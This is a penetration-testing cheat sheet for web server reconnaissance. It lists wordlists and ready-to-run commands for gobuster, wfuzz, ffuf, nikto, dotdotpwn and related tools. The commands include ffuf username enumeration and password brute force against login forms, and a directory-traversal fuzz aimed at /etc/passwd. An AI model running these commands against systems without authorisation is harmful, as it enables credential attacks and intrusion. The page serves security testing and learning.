Webserver scanning

Related

Common wordlists

General
  • /usr/share/seclists/Discovery/Web-Content/common.txt
  • /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
CGI
  • /usr/share/seclists/Discovery/Web-Content/CGIs.txt
SharePoint
  • /usr/share/wordlists/SecLists/Discovery/Web_Content/sharepoint.txt

gobuster

GitHub - OJ/gobuster - Directory/File, DNS and VHost busting tool written in Go
1
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -o gobuster -t 50 -u <host>
Copied!

File extensions

IIS
1
-x 'asp, aspx, html, txt'
Copied!
Apache / nginx
1
-x 'php, cgi, jsp, html, txt'
Copied!

wfuzz

GitHub - xmendez/wfuzz - Web application fuzzer
1
wfuzz -w <wordlist-file> —-hc 404 <host>/FUZZ/FUZ2Z
Copied!
1
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --sh BBB <host>/file.php?param=FUZZ
Copied!

fuff

Fast web fuzzer written in Go. fuff
Enumerate usernames
1
ffuf -w <wordlist-file> -X POST -d "email=FUZZ&password=x" -H "Content-Type: application/x-www-form-urlencoded" -u <url> -mr "email already exists"
Copied!
Brute force passwords
1
ffuf -w emails.txt:W1,<password-file>:W2 -X POST -d "email=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u <url> -fc 200
Copied!

nikto

GitHub - sullo/nikto - Web server scanner
1
nikto -h <ip> -Format txt -o .
Copied!

dotdotpwn

GitHub - wireghoul/dotdotpwn - The Directory Traversal Fuzzer
1
dotdotpwn -m http -h <ip> -f <file>
Copied!
1
dotdotpwn -m http-url -u http://<ip>/nav.php?page=TRAVERSAL -o unix -s -d 4 -k "root:" -f /etc/passwd
Copied!

dirb

DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.
1
dirb <host> -o dirb
Copied!

DirBuster

DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers.
1
dirbuster
Copied!

Web application firewall (WAF) detection

You can use wafw00f to detect web application firewalls (WAFs).
1
wafw00f <url>
Copied!

wappalyzer (firefox add-on)